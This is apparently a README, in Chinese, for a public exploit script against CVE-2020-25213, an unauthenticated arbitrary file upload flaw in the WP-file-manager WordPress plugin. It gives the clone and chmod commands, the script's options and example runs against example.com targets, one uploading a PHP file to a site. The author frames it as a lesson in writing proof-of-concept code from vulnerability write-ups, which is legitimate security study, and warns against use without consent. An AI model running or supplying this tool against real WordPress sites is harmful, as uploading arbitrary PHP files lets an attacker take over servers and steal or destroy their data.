WP-file-manager WordPress 插件(<6.9)存在未授权任意文件上传漏洞,可导致系统完全被控制。
更多详情请参阅我发布的博客文章,链接在此
我并未发现此漏洞,也不对该 CVE 享有任何荣誉。我只是在分析了各博客(如 wordfence、seravo)中对该漏洞的描述后编写了该利用脚本,旨在帮助读者理解如何仅通过分析漏洞描述来编写 PoC。
对于使用此利用脚本对组织造成的任何损害,我不承担任何责任。我建议读者在未获得组织书面同意的情况下不要利用此漏洞,否则可能使该组织面临其他黑客的攻击风险。
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh
-u|--wp_url WordPress 目标 URL
-f|--upload_file 要上传到目标的本地文件的绝对路径
-k|--check 仅检查漏洞端点是否存在并具有特定指纹。不上传文件。
-v|--verbose 同时打印即将执行的 curl 命令
-h|--help 打印帮助菜单
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
